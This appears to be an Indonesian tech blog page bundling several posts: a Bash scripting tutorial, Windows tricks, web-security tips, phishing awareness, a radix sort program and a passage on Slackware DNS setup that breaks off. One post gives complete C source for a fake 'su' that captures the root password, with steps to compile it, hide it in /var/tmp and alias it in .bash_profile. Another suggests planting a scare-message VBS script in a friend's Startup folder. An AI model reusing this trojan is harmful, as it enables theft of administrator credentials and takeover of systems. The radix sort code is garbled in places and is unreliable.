Jaringan kita telah berkembang pesat, dengan redudant firewalls yangbaru, server mail, proxy cache dan seterusnya. Sekarang pikiran kita diisi dengan alamat ip dan jari-jari kita bosan mengetik semua angka-angka dan titik.
Artikel selengkapnya dapat anda lihat di sini
6.19.2010
OpenBSD DNS server
OpenBSD Proxy Server
Kita telah banyak tumbuh dan begitu terbiasa untuk akses internet pada komputer pekerjaan kita, bahwa kita tidak bisa membayangkan apa yang pernah dilakukan sepanjang hari di tempat kerja kita sebelumnya!
Dengan menyediakan akses ke sejumlah informasi, internet telah cepat berubah menjadi alat kerja penting.
Artikel tentang cara instalasi openbsd proxy server dapat anda lihat di sini
Mengatur bandwidth dengan squid delay pool
Mau memberikan jaminan download file dari internet yang “fair” ? coba gunakan fitur delay pool yang disediakan oleh squid (proxy server). Delay pool dapat Anda jadikan sebagai cara termudah bagi Anda dalam mengelola bandwidth internet pada kantor atau warnet Anda, meskipun hanya sebatas mengatur bandwidth download file via http atau ftp, ternyata delay pool dapat memberikan layanan jaringan yang lebih berkualitas bagi jaringan dikantor atau warnet Anda.
Artikel selengkapnya bisa anda peroleh di sini
Linux Bash Script - Scripting dengan Bash
Tahukah Anda bahwa Linux memiliki scripting seperti batch file di DOS? Dengan scripting, PC Anda dapat bekerja secara otomatis tanpa banyak 'bertanya'. Walaupun saat ini eranya interface grafis, tidak semua hal cocok ditangani dengan klik mouse.
Scripting adalah salah satu bentuk pemrograman. Secara spesifik, scripting lebih dikaitkan dengan pemrograman interpreter, contohnya pada shell Bash (Bourne Again Shell) yang akan dibahas kali ini. Lalu, apa itu shell? Mungkin Anda tidak terlalu familiar dengan istilah ini, tapi sering menggunakannya. Apabila Anda memakai program seperti xterm atau Konsole untuk mengetik perintah, berarti Anda telah menggunakan shell. Saat Anda masuk ke mode teks, Anda pun berhadapan dengan shell. Shell dapat diibaratkan seorang pelayan yang siap mengerjakan perintah tuannya sekaligus menyajikan hasil perintah pada kita. Karena shell hanyalah 'pelayan', maka jika perintahnya salah, shell pun tidak akan memberikan hasil yang diinginkan.
Shell ada bermacam-macam, di antaranya Bash, csh dan zsh. Untuk mengetahui shell yang digunakan, bisa digunakan beberapa cara:
1. Gunakan perintah set dan cek nilai variabel SHELL
$ set | grep SHELL
SHELL=/bin/bash
2. Periksa file /etc/passwd dan lihat kolom terakhir dari entry user Anda
$ cat /etc/passwd | grep mulyadi
mulyadi:x:500:500:Mulyadi Santosa:/home/
mulyadi:/bin/bash
Output-output di atas mengkonfirmasikan bahwa Anda sedang menggunakan shell Bash. Pada artikel ini, diasumsikan Anda telah mengetahui beberapa perintah dasar Linux dan dapat langsung berkonsentrasi pada logika dan syntax scriptingnya. Seperti biasa, prompt $ menunjukkan bahwa perintah dapat dilakukan oleh user non root dan prompt # berarti perintah dilakukan oleh root. Tidak ada batasan distribusi Linux apa yang harus digunakan.
Untuk memulai bekerja dengan scripting, buatlah sembarang file teks kosong dan tetapkan sebagai file executable:
$ touch coba.sh
$ chmod a+x ./coba.sh
Nama file-nya tidak harus berakhiran .sh. Ini hanyalah konvensi untuk memudahkan mengenali bahwa file ini adalah file script. Perintah chmod juga diperlukan agar file ini bisa dieksekusi. Sekali lagi, untuk praktisnya, file kita set agar bisa dieksekusi oleh semua user. Apabila Anda lupa tentang syntax chmod, baca lagi artikel di CHIP mengenai permission atau baca manual chmod.
Untuk mencobanya, isi baris berikut pada file coba.sh. Anda dapat menggunakan sembarang teks editor seperti Vi, emacs, Kwrite, atau lainnya:
#!/bin/bash
echo a
Baris kedua mungkin tidak asing bagi Anda, tapi baris pertama mungkin terlihat aneh karena terdapat tanda #!. Tanda tersebut merupakan penanda bagi shell untuk menjalankan dulu interpreter yang dimaksud (Bash) sebelum menjalankan perintah pada baris-baris selanjutnya. Path yang diberikan merupakan path lengkap yang menunjuk ke nama program bash itu sendiri, jadi tidak bisa sekadar dicantumkan nama programnya, misalnya:
#!bash
Apabila Anda kesulitan mencari lokasi program bash, baik karena distro Linux menaruhnya di tempat lain atau Anda mengcompile sendiri shell, gunakan perintah berikut untuk mencarinya.
$ whereis bash
bash: /bin/bash
Lanjutkan dengan menjalankan file tersebut seperti contoh berikut ini.
$ ./coba.sh
File coba.sh diawali dengan ./ karena direktori tempat menyimpan file script tersebut belum tentu masuk dalam area pencarian program. Lebih tepatnya, setiap kali Anda mengetik suatu nama program tanpa didahului nama path, maka Linux akan mencarinya di lokasi sesuai isi variabel PATH:
$ echo $PATH
/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/
usr/X11R6/bin
Dengan asumsi file coba.sh ditaruh di home direktori Anda, maka jelas file tersebut tidak akan ditemukan secara otomatis oleh Linux. Anda dapat mencobanya sendiri dengan memodifikasi cara eksekusi:
$ contoh.sh
bash: contoh.sh: command not found
Setelah pengetahuan dasar sudah disampakan, Anda dapat melanjutkan ke tahapan scripting sebenarnya:
A. Menerima Parameter
Pada scripting berikut ini, Anda ingin mencetak sesuai parameter yang diberikan. Untuk itu, ketik script berikut ini.
#!/bin/bash
echo $1
echo $2
echo $3
Lalu jalankan dengan perintah seperti di bawah ini.
$ ./coba.sh 1 2 3
Variabel $1, $2, dan seterusnya berfungsi mengambil nilai parameter sesuai urutan penulisan parameter. $1 memuat isi parameter pertama, $2 memuat isi parameter kedua, dan seterusnya. Parameter dipisahkan oleh spasi. Jadi, setiap parameter yang dipisahkan spasi akan dianggap parameter yang terpisah. Pertanyaannya, bagaimana jika script dijalankan seperti berikut ini?
$ ./contoh.sh ‘1 2 3’
1 2 3
Ternyata seluruh string 1, 2, dan 3 dianggap sebagai satu parameter. Ini adalah salah satu trik yang bisa digunakan bila Anda berurusan dengan parameter berspasi. Kadangkala, Anda perlu memeriksa jumlah parameter untuk mengantisipasi kesalahan pemanggilan. Untuk keperluan ini, ada variabel lainnya yang dapat Anda gunakan yaitu $#. Dengan mengadopsi variabel ini, Anda dapat membuat script yang sedikit lebih cerdas:
#!/bin/bash
if [ $# -lt 1 ]
then
echo Anda tidak memasukkan
parameter!
else
echo $1
echo $2
echo $3
fi
Script di atas mengecek berapa banyak parameter yang Anda masukkan. Apabila lebih kecil dari 1 (baris if), pesan peringatan akan ditampilkan. Apabila memang ada parameter, tiga parameter pertama akan ditampilkan. Tentang pengecekan kondisi akan diterangkan berikutnya.
B. Kondisi dan Percabangan
Contoh sederhana dari percabangan telah diberikan, yaitu If digunakan untuk memeriksa jumlah parameter. Adapun format lengkap dari 'if-then-else' adalah:
if kondisi
then
perintah
else
perintah
fi
Bagian else dapat Anda abaikan karena bersifat optional. Perhatikan bahwa then dan else masing-masing menempati baris tersendiri, tidak sebaris dengan if. Apabila Anda memahami pemrograman C, perbedaannya terlihat pada tidak adanya tanda { atau } sebagai penanda blok.
Pernyataan kondisi (conditional statement) ada beragam jenisnya. Untuk lebih memahaminya, simak script berikut ini.
#!/bin/bash
if [ $# -lt 1 ]
then
echo Anda tidak memasukkan parameter!
exit
fi
if [ $1 -eq 0 ]
then
echo Anda memasukkan nol
elif [ $1 -lt 0 ]
then
echo lebih kecil dari nol
elif [ $1 -ge 1 -a $1 -le 10 ]
then
echo Antara 1 dan 10
else
echo Lebih besar dari 10
fi
Script ini menunjukkan dua hal. Pertama, pernyataan kondisi selalu dilakukan dengan diapit tanda [ dan ]. Kedua, operator pembandingnya tidak memakai tanda “=” atau “<”, atau sejenisnya, tetapi berupa kumpulan huruf.
C. Perulangan
Mengulang suatu perintah berdasar kondisi tertentu sangat penting artinya dalam mengefisiensikan pengetikan perintah. Untuk keperluan seperti ini, tersedia for, while, dan until. Misalnya, Anda ingin menjumlahkan dua bilangan atau lebih. Dengan for, maka script-nya menjadi seperti berikut ini.
$ cat add.sh
#!/bin/sh
for operand in “$@”
do
let tampung=tampung+operand
done
echo $tampung
$ ./add.sh 3 4 5
Variabel $@ berguna untuk mereferensi parameter-parameter script secara keseluruhan sehingga Anda dapat mereferensikan parameter tersebut, berapa pun banyaknya, secara fleksibel. Namun, agar variabel $@ dapat digunakan oleh for dengan benar, variabel tersebut harus diapit oleh tanda petik ganda (“ ”). Ini dilakukan agar setiap parameter dapat direferensikan per kata, bukan sebagai satu string panjang.
Bagaimana dengan pengulangan while? While mengulang suatu perintah selama kondisinya benar. Apabila while digunakan sebagai ganti for (untuk contoh tadi), scriptnya akan menjadi seperti berikut ini.
#!/bin/sh
let tampung=tampung+$1
while [ $# -gt 1 ]
do
shift
let tampung=tampung+$1
done
echo “$tampung”
Perhatikan perintah shift yang digunakan di atas. Perintah ini berguna untuk menggeser posisi parameter sehingga parameter kedua menjadi parameter pertama, parameter ketiga menjadi kedua, dan seterusnya. Parameter pertama sendiri menjadi hilang. Shift secara default menggeser sebanyak satu posisi ke nomor parameter yang lebih rendah.
D. Membaca Input User
Input tidak harus berupa parameter yang dipakai saat script akan dijalankan, tetapi dapat juga diberikan saat script sedang dijalankan (dieksekusi). Perintah yang Anda perlukan di sini adalah read serta variabel penampung data. Berikut ini akan diberikan contoh sederhana perhitungan kuadrat dari suatu bilangan. Script akan terus meminta input sampai user memasukkan angka nol. Untuk mencegah user memasukkan bilangan yang terlalu besar, maka angkanya dibatasi maksimal tiga digit.
#!/bin/bash
declare -i angka=0
read -p “Masukkan angka [ ‘0’ untuk berhen
ti ]: “ -n 3 angka
while [ $angka -ne 0 ]
do
let kuadrat=angka**2;
echo -e “\nKuadrat dari $angka adalah $ku
adrat”;
read -p “Masukkan angka [ ‘0’ untuk berhen
ti ]: “ -n 3 angka
done
Opsi -p berguna untuk menambahkan string prompt yang Anda inginkan, sedangkan -n mendefinisikan berapa maksimum karakter yang dapat dimasukkan. Anda pun dapat menggunakan perintah declare untuk mendefinisikan variabel angka sebagai integer. Dengan cara ini, jika data yang dimasukkan bukan berupa angka, perulangannya akan otomatis berhenti karena akan disamakan dengan angka nol.
E. Membuat Fungsi
Dalam sebuah script, dapat ditemukan beberapa perintah yang dikerjakan berulang-ulang. Daripada harus menulisnya berulangkali, akan lebih efisien jika Anda membuat fungsi yang berisi kumpulan perintah tersebut. Pada contoh sederhana berikut ini akan dideklarasikan fungsi untuk memeriksa apakah suatu angka adalah bilangan prima atau bukan. Fungsi ini selanjutnya dipakai dalam sebuah looping untuk memeriksa deretan angka 1 sampai dengan 100.
#!/bin/bash
hitung()
{
local count=0
for a in `factor $1`
do
let count++
done
if [ $count -gt 2 ]
then echo “$1 bukan bilangan
prima”
else echo “$1 bilangan prima”
fi
}
for angka in `seq 1 100`
do
hitung $angka;
done
Caranya juga sama seperti cara Anda mengakses parameter shell script. Perlu diingat bahwa positional variable di dalam fungsi hanya mengakses nilai parameter fungsi, bukan parameter dari shell script! Di sini juga terlihat deklarasi variabel count, tetapi menggunakan perintah local. Dengan perintah ini, count hanya bisa diakses di dalam fungsi hitung dan menjadi tidak berarti pada fungsi atau badan script utama. Ini adalah cara yang baik untuk mencegah suatu variabel dimanipulasi di luar fungsi yang menggunakannya.
Artikel ini hanya membahas 'segelintir' bagian shell scripting yang sifatnya cukup kompleks. Gabungkan informasi-informasi yang telah Anda pelajari dalam artikel ini untuk membuat satu shell script yang membantu tugas sehari-hari Anda. Kemungkinannya tidak terbatas! Ketik 'info bash' untuk melihat informasi lengkap mengenai Bash.
Artikel yang lengkap bisa anda lihat di sini
Windows itu LUCU & ANEH ya?
Kalau biasanya kita belajar serius, sekarang kita nyante aja ya…? Setuju? Sekarang kita akan main-main dengan windows, sistem operasi yang paling populer saat ini. Ada 6 permainan yang akan kita lakukan. Alatnya: notepad. Jadi nggak butuh software yang macem-macem. Anda akan terheran-heran & geleng-geleng kepala. Okey sudah siap? Lanjut…
Permainan ke-1: Cek apakah antivirus Anda bekerja
Ngomong-ngomong, komputer Anda sudah ada antivirusnya belum? Nah kalau sudah, kita cek apakah antivirus Anda bekerja. Caranya buka notepad (Start -> Program -> Accessories -> Notepad). Copy-paste kode ini di notepad:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Tutup notepad. Kalau ada pertanyaan “do you want to save?” jawab “Yes”. Gimana? file tadi hilang kemana? Masih belum hilang? Rename dari ekstensi TXT menjadi EXE, depannya terserah. Sebelumnya perlihatkan ekstensi file dulu yah (Tool -> Folder Option -> View, uncheck pada pilihan hide extension).
Permainan ke-2: Membuat virus palsu
Buka notepad. Copy paste kode ini:
lol=msgbox (“Virus berbahaya terdeteksi di komputer Anda. Pilih YES untuk memformat harddisk Anda sekarang, atau NO untuk memformat harddisk setelah restart.”,20,”Warning”)
Save dengan nama virus-palsu.vbs Klik double file tadi. Nah, serem kan? Tapi itu cuma bohongan kok. Sekarang klik kanan start menu, pilih explore. Taruh file tadi di folder Start Menu -> Programs -> Startup. Maka virus gadungan tadi akan muncul setiap kali windows start. Lumayan kalau dipasang di komputer teman bisa ngagetin.
Permainan ke-3: Tidak bisa membuat folder
Buat sebuah folder di mana saja dengan nama CON, huruf kecil atau huruf besar nggak masalah. Bagaimana? Bisa nggak?
Permainan ke-4: Rahasia Microsoft Word
Kalau Anda masih membuka dokumen Microsoft Word, simpan dan tutup dulu. Soalnya Anda nggak tahu apa yang akan terjadi. Sekarang ketik kalimat ini:
=rand (200, 99)
Kemudian tekan enter. Maka akan terjadi keanehan!
Permainan ke-5: Bush hid the facts
Copy-paste atau ketik tanpa tanda petik di notepad: “Bush hid the facts” . Kemudian simpan dan tutup notepad. Buka lagi file tadi. Tulisannya berubah jadi apa?
Permainan ke-6: .LOG file
Buka notepad. Baris paling atas, ketik .LOG (ada titiknya lho), kemudian ENTER. Save dan tutup notepad. Sekarang buka lagi file tadi. Tulis apa saja di bawah tulisan .LOG, simpan kemudian tutup. Buka lagi file tadi, sekarang ada jamnya ya? Tulis sesuatu lagi, simpan kemudian tutup. Yang jelas setiap kali kita membuka dan menyimpan, selalu ada waktu yang mengikuti. Itu gara-gara baris pertamanya .LOG
Selamat mencoba!
23 Tools WIndows
klik start > run
kemudian masukkan nama program yang bercetak tebal dibawah ini :
1. Character Map = charmap.exe
untuk melihat karakter seperti t82;©®
2. Disk Cleanup = cleanmgr.exe
untuk cleanup disk
3. Clipboard Viewer = clipbrd.exe
liat apa yang dicopy menggunakan ctrl+C
4. Dr Watson = drwtsn32.exe
Ini buat kalo ada troubleshooting di PC. kayak dokter gitu
5. DirectX diagnosis = dxdiag.exe
ini buat diagnosis audio video card anda
6. Private character editor = eudcedit.exe
Ini untuk buat karakter baru di windows anda
7. IExpress Wizard = iexpress.exe
untuk membuat self extractor. seperti file Zip
8. Microsoft Synchronization Manager = mobsync.exe
Seperti namanya, buat sincronisasi..
9. Windows Media Player 5.1 = mplay32.exe
ini WMP versi lawas
10. ODBC Data Source Administrator = odbcad32.exe
Ini sesuatu yang digunakan untuk keperluan database
11. Object Packager = packager.exe
Ini untuk memasukkan objek kedalam file..
12. System Monitor = perfmon.exe
seperti judulnya, ini untuk memonitor PC anda..
13. Program Manager = progman.exe
ini warisan dari Windows 3.x desktop shell
14. Remote Access phone book = rasphone.exe
Sejenis buku telepon
15. Registry Editor = regedt32.exe [juga regedit.exe]
untuk melakukan tweaking, editing registry windows
16. Network shared folder wizard = shrpubw.exe
Membuat shared folder dalam jaringan
17. File siganture verification tool = sigverif.exe
program verifikasi signature
18. Volume Control = sndvol32.exe
buat nampilin sound control di System Tray
19. System Configuration Editor = sysedit.exe
untuk mengubah system.ini dan win.ini
20. Syskey = syskey.exe
untuk melakukan konfigurasu account di windows
21. Microsoft Telnet Client = telnet.exe
ini untuk melakukan koneksi internet sebelum ada browser
22. Driver Verifier Manager = verifier.exe
untuk monitoring driver di windows anda.
23. Windows for Workgroups Chat = winchat.exe
untuk chat..
Membuat Web Aman Dari Hacker
Pertama
Pada umumnya, hosting websites dilakukan pada ISP (Internet Service Provider) dengan space tertentu, lalu kita melakukan upload website via FTP atau via CPANEL (Control Panel). Webhosting inilah yang rawan dan mudah sekali dibobol oleh Hacker di antaranya mengunakan teknik SQL Injection. Maka disarankan agar mengunakan Server sendiri dan mengunakan VPS (Virtual Private Server). Dengan Server sendiri atau Virtual Private Server bisa mengunakan berbagai proteksi terhadap kita secara Customized. Beda dengan Web Hosting, proteksi security dilakukan terserah apa kata ISP. Kelemahan proteksi inilah yang dimanfaatkan oleh Hacker dengan melakukan Port Scanning untuk menemukan celah security yang bisa ditembus untuk bisa masuk dan mengambil alih websites tersebut.
Tips Kedua
Mengunakan Hardware Security yang powerfull diantaranya yang memiliki fitur Firewall, IDS (Intrusion Detection System) dan IPS (Intrusion Prevention System). Contohnya mengunakan Fortigate, Cisco Series Security, 3Com Tipping Point, dan lainnya. Dapat juga mengunakan software IDS seperti Black ICE Countermeasures ataupun Distro Linux untuk security system seperti Smootwall, Monowall, Customized Distro Linux, dan lainnya. Umumnya, baik software maupun hardware security ini bisa secara otomatis mengirimkan email alert bahkan bisa mengirimkan alert via SMS jika system mendeteksi adanya serangan dari hacker.
Tips Ketiga
Mengunakan system yang Stable yang sudah perfect systemnya, sehingga kemungkinan adanya celah keamanan juga dapat diminimalkan. Banyaknya software atau tool web builder dengan berbagai versi terutama versi gratis/ free License/ Freeware, sebaiknya para pemakai memilih versi yang sudah dinyatakan Stable. Seperti adanya BUG pada software Joomla versi 1.5.0 - 1.5.5.
Tips Keempat
Web Administrator/ System Administrator harus melakukan Review, Testing, Simulasi secara berkala terhadap keamanan pada Server yang dikelolanya. Bahkan bisa bekerja sama dengan Hacker (White Hacker yang dapat dipercaya reputasinya) untuk melakukan Audit terhadap implementasi Security webservernya.
Mendapatkan Password root dengan Jebakan.
Pernahkan anda merasa jengkel saat anda melakukan sesuatu di mesin Linux dengan account user biasa semua serba terbatasi. atau jika anda sudah mendapatkan file passwd dan shadow untuk di crack dengan John the Ripper dengan brute forcenya, tetapi anda malas untuk menunggu proses cracking selesai, (bisa botak tumbuh paku mas kenthir nungguinnya :( )
kali ini sang admin akan kita bohongi, perintah dalam linux untuk login menjadi super user atau menjadi admin yaitu dengan mengetikkan perintah "su" lalu dilanjutkan dengan mengetikan password, nah kita akan memasang program jebakan, jadi, ketika sang admin mengetikkan perintah "su" otomatis program akan menjalankan program "su" yang kita alias ke program yang kita tentukan letakkan dengan perintah "alias" menggunakan perintah "alias", lebih lanjut silahkan baca manualnya
uname@slacker:~$ man alias
di bawah ini adalah source code dari program ".su" yang mengecoh admin dibuat oleh salah seorang staf kecoak-elektronik Indonesia, Pseudoanonymous.
------------ The Code ----------------
/*
* su "evil" brought to you by Kecoak's C SHell
* (c) 2007 Kecoak Elektronik Indonesia
*
* Still alive to break and burn the sky
* Still decided to take overing the network use unusual ways
* Still silent and keep the underground spirit!
*
* 1. gcc -O2 -o .su su.c
* 2. mv .su /var/tmp/.su
* 3. echo "alias su=/var/tmp/.su" >> ~/.bash_profile
*/
#include
#include
#include
#define SU "/bin/su" /* better search the correct path */
#define PASSWD "/var/tmp/.passwd"
#define LOCK "/var/tmp/.su.lock"
extern char **environ;
int main(int argc, char **argv) {
char *pass;
char *user;
char *ruser;
FILE *inFile;
switch(argc) {
case 1:
user = "root";
break;
case 2:
if(!strncmp("-", argv[1], 1)) {
user = "root";
}
else {
user = argv[1];
}
break;
case 3:
user = argv[2];
break;
}
if((inFile = fopen(LOCK, "r")) != NULL) {
unlink(LOCK);
argv[0] = SU;
execve(argv[0], argv, environ);
}
if((inFile = fopen(PASSWD, "a+")) == NULL) {
execle(SU, SU, argv[1], argv[2], NULL, environ);
#ifdef DEBUG
perror("open() on PASSWD file");
#endif
}
pass = getpass("Password: ");
ruser = getenv("USER");
fprintf(inFile, "%s tried %s / %s\n", ruser, user, pass);
fclose(inFile);
inFile = fopen(LOCK, "w");
fclose(inFile);
printf("su: Permission denied\nSorry\n");
return 0;
}
------------ End of Code ----------------
Saya tidak menjelaskan baris per baris bagaimana program ini bekerja, karena mas kenthir malas menulisnya hehehe,, silahkan anda pahami sendiri ,, :)
Silahkan kompile menggunakan gcc
uname@slacker:~$ gcc -O2 -o .su su.c
jika ada warning, biarkan saja, lalu pindahkan ke direktori /var/tmp agar tidak terlalu mencurigakan,
uname@slacker:~$ mv .su /var/tmp/.su
file ".su" akan hidden di direktori /var/tmp, setting "alias" akan selalu ada di load di dalam "bash" atau "shell" pada file ".bash_profile" dengan mengetikkan perintah,
uname@slacker:~$ echo "alias su=/var/tmp/.su" >> ~/.bash_profile
nah, pada tahap ini semua persiapan sudah beres, tinggal menunggu si admin menjalankan perintah "su" yang akan pada akhirnya akan menjalankan program
"/var/tmp/.su" (licik juga kau ???)
uname@slacker:~$ su
Password:
su: Permission denied <--- hanya tipuan, seakan-akan admin salah mengetikkan password, padahal password sudah di capture
Sorry
uname@slacker:~$ su
Password:
root@slacker:/home/uname# <--- login sekali lagi, admin berhasil login
dan setelah kecelakaan di atas, sekarang kita nikmati hasil jebakannya , dengan mengetikkan perintah,
uname@slacker:~$ vi /var/tmp/.passwd
lalu muncul seperti di bawah ini, diketahui user biasa adalah "uname" dan mencoba password "root" "guegila123"
uname tried root / guegila123
+++++++++++++++++++++++++++++++++++++++++
Artikel ini bertujuan untuk memperingatkan kepada kita tidak ada yang 100% aman dari sistem komputer, dan selalu waspada terhadap data-data penting di mesin kita, jangan gunakan trik di atas di mesin yang bukan milikmu, jika melanggar, segeralah bertaubat, kiamat udah deket booozzz .. :)
Waspadai Phishing, Perhatikan Cirinya
Phising merupakan salah satu penipuan lewat internet untuk mencuri data-data pribadi yang masih marak saat ini. Phising biasanya dilakukan dengan mengirim 'umpan' berupa email yang akan mengarahakan penerimanya ke situs-situs palsu yang sangat mirip dengan situs aslinya.
Situs-situs tersebut akan meminta pengunjungnya untuk memasukkan data-data pribadi, seperti nomor kartu kredit, nomor rekening, password, tanggal lahir, atau nama ibu kandung. Data-data yang dicuri pelaku phising itulah yang akan digunakan untuk menguras rekening korban atau melakukan tindak penipuan.
Phising sendiri berasal dari kata fishing atau memancing. Phising biasanya menggiring seseorang dari email untuk masuk ke dalam situs internet. Oleh karena itu, email phising selalu meminta pengguna untuk menge-klik sebuah link yang akan membawanya ke sebuah situs untuk memasukkan data pribadi.
Untuk menghindari phising, sebaiknya Anda perhatikan ciri email yang biasa dikirimkan pelaku fishing sebagai berikut:
- Sapaan Umum. Email phising biasanya dikirimkan dalam jumlah besar sekaligus. Untuk menghemat waktu para pelaku tindak kriminal melalui internet ini menggunakan sapaan umum, seperti "Pelanggan terhormat".
- Forged Link. Arahkan mouse ke link yang dimaksud dan perhatikan apakah cocok dengan hyperlink-nya. Bila tidak ada kecocokan, jangan klik link tersebut. Situs yang terpercaya biasanya diawali dengan "https". Huruf 's' berasal dari kata secure. Jangan dilanjutkan jika Anda tidak melihat "https" pada link yang dituju. Biasanya, alamat asli phishing tak beraturan alias berantakan.
- Menanyakan Data Pribadi. Tujuan utama phishing adalah untuk mendapatkan data pribadi Anda. Jadi jangan mudah percaya jika ada email yang menanyakan hal tersebut.
- Terkesan Darurat. Para kriminal internet ini membuat Anda berpikir, telah terjadi sesuatu yang mengharuskan tindakan cepat. Seperti menggunakan kata 'urgent'. Jika Anda menerima email dengan tanda-tanda di atas, hati-hati. Bisa saja Anda menjadi korban phishing.
Intinya, jangan pernah memasukkan identitas pribadi seenaknya. Jika Anda melakukan transaksi melalui Internet, jangan pernah melakukannya dari alamat link manapun. Pastikan Anda mengetik sendiri alamat tersebut di browser web Anda.
Metode Sorting dengan Radix Sort
Radix Sort adalah metode sorting tanpa pembandingan dengan kata lain, sorting Non-Comparasion sort dimana dalam prosesnya tidak melakukan perbandingan antar data. Secara umum yang proses yang dilakukan dalam metode ini adalah mengklasifikasikan data sesuai dengan kategori terurut yang tertentu dan dalam tiap kategorinya dilakukan pengklasifikasian lagi dan seterusnya sesuai dengan kebutuhan. Dan kemudian subkategori-subkategori tersebut digabungkan kembali, yang secara dilakukan hanya dengan metode sederhana concatenation.
Apa itu Radix Sort??? Radix Sort merupakan algoritma pengurutan yang ajaib yang mana mengatur pengurutan nilainya tanpa melakukan beberapa perbandingan pada data yang dimasukkan. Kata radix bermakna harafiah posisi dalam angka [1]. Di mana sederhananya, dalam representasi desimal, radix adalah digitnya. Dalam implementasinya, Radix Sort merupakan algoritma pengurutan yang cepat, mudah, dan sangat efektif. Namun banyak orang yang berpikir bahwa algoritma ini memiliki banyak batasan di mana untuk kasus-kasus tertentu tidak dapat dilakukan dengan algoritma ini, seperti pengurutan bilangan pecahan dan bilangan negatif,
Berdasarkan urutan pemrosesan radixnya, Radix Sort terbagi 2 macam, yaitu: LSD (Least Significant Digit), di mana pemrosesan dimulai dari radix yang paling tidak signifikan. dan MSD (Most Significant Digit), di mana pemrosesan dimulai dari radix yang paling signifikan.
Proses dasar Radix Sort adalah mengkategorikan data-data menjadi subkumpulan-subkumpulan data sesuai dengan nilai radix-nya, mengkonkatenasinya, kemudian mengkategorikannya kembali berdasar nilai radix lainnya.
Dibawah ini adalah syntax Radix Sort:
#include
#include
main()
{
int a, b, leng, data[100], d, m, temp[100], index;
printf("Banyak data : ");
scanf("%d",&leng);
for (a=0;a
{
printf("data %d = ",a+1);
scanf("%d",&d);
if (d<1000)
{
data[a]=d;
}
else a--;
}
printf("\nData Anda: ");
for (a=0;a
{
printf("\nData %d= %d ",a+1,data[a]);
}
index=0;
for (a=0;a<=9;a++) //lsb sort
for (b=0;b
{
if (data[b]<100)
{
m=data[b]%10;
}
else
{
m=data[b]%100;
m=m%10;
}
if (m==a)
{
temp[index]=data[b];
index++;
}
}
for (a=0;a<=9;a++)
{
data[a]=temp[a];
}
index=0;
for (a=0;a<=9;a++) //csb sort
for (b=0;b
{
if (data[b]<100)
{
m=data[b]/10;
}
else
{
m=data[b]%100;
m=m/10;
}
if (m==a)
{
temp[index]=data[b];
index++;
}
}
for (a=0;a<=9;a++)
{
data[a]=temp[a];
}
index=0;
for (a=0;a<=9;a++) //msb sort
for (b=0;b
{
m=data[b]/100;
if (m==a)
{
temp[index]=data[b];
index++;
}
}
for (a=0;a<=9;a++)
{
data[a]=temp[a];
}
printf("\n\nSetelah di Sorting\n");
for (a=0;a<(leng);a++)
{
printf("%d",data[a]); printf("\n");
}
}
SEMANGAT !!!
Bagaimana Setting DNS server di Slackware
DNS merupakan singkatan dari Domain Name Service, fungsi utamanya adalah menerjemahkan alamat ip komputer dengan alamat yang lebih manusiawi atau bahasa daerahnya ?humanable?.Seperti yang kita ketahui, setiap komputer yang terhubung ke internet harus punya ip address sebagai alamatnya.Tentunya kita tidak mungkin ingin selalu mengetikkan alamat seperti 66.94.234.13
untuk membuka email di yahoo.com, dan mengingat milyaran website dengan ip addressnya. (jangan gila donk).. #!##$%
di bawah ini beberapa file yang saya ubah untuk setting DNS,
/etc/resolv.conf
/etc/named.conf
/var/named/caching-example/localhost.zone
/var/named/caching-example/named.local
kali ini mas kenthir akan membuat Server DNS dengan OS Slackware 12.1 (192.168.0.16) sebagai komputer A untuk menterjemahkan IP Address komputer B yang menjalankan Apache Webserver di OS Slackware 9.0 (192.168.0.6).
mas kenthir asumsikan anda sudah menginstall aplikasi bind, secara default terinstall saat instalasi Slackware Linux,
Kita akan bahas per blok, dan apa saja modifikasi yang akan kita buat.
pertama kita buka file named.conf di /etc/named.conf
+++BLOK PERTAMA+++
options {
directory "/var/named";
/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/
// query-source address * port 53;
};
Blok ini merupakan global setting dari bind, directory ?/var/named? adalah direktory kerja dari bind, di direktory tersebut di tempatkan file ? file konfgurasi domain yang biasa di sebut zone. Tidak disarankan untuk mengutak ? atik blok ini kecuali Anda tahu apa yang Anda kerjakan. Atau dengan kata lain, biarkan mi saja begitu.
+++BLOK KEDUA+++
zone "." IN {
type hint;
file "caching-example/named.root";
};
Blok ini merupakan blok root zone atau kasarnya alamat ? alamat dari domain ? domain internasional. Kita membutuhkan blok root zone ini. Biasanya saya melakukan perubahan dengan menghilangkan ?caching-example/? pada baris file sehingga hanya berbentuk seperti ini : (ini terserah perut anda, karena menurut saya lebih mudah dalam pengorganisasian file konfigurasi).
file "named.root";
lalu kita pindahkan file "named.ca" dan file konfigurasi lainnya, dengan mengetikkan di konsol seperti ini;
# mv /var/named/caching-example/* /var/named
(tanpa tanda kres, hanya untuk memberitahukan anda harus sebagai root)
+++BLOK KETIGA+++
zone "localhost" IN {
type master;
file "localhost.zone";
allow-update { none; };
};
Blok ini adalah forward localhost, Dalam artian jika dns server mendapatkan perintah untuk mengetahui alamat ip dari localhost maka bagian blok ini yang mengurusnya. mas kenthir sarankan untuk tetap menyimpan blok ini tapi berhubung sudah memindahkan file /var/named/caching-example/ jadi bari filemenjadi :
file "localhost.zone";
+++BLOK KEEMPAT+++
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
allow-update { none; };
};
Blok ini merupakan kebalikan dari blok localhost atau biasa disebut reverse, karena kebalikan reverse kerjanya juga terbalik yaitu mencari nama dari ip yang di?query?kan ke DNS server.
kita akan membuat domain slacker.org untuk komputer B dengan ip 192.168.0.6, dan domain uname.slacker.org untuk komputer A dengan ip 192.168.0.16 yang bertugas sebagai DNS Server.
kita pindah ke direktori ;
# cd /var/named
lalu kita copy-kan saja konfigurasi awal dengan mengetikkan perintah ;
# cp localhost.zone slacker.zone
# cp named.local 192.168.0.zone
buka file konfigurasi "named.conf" dengan teks editor kesayangan anda
ganti dengan kofigurasi sebagai berikut;
# vi /etc/named.conf
options {
directory "/var/named";
/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/
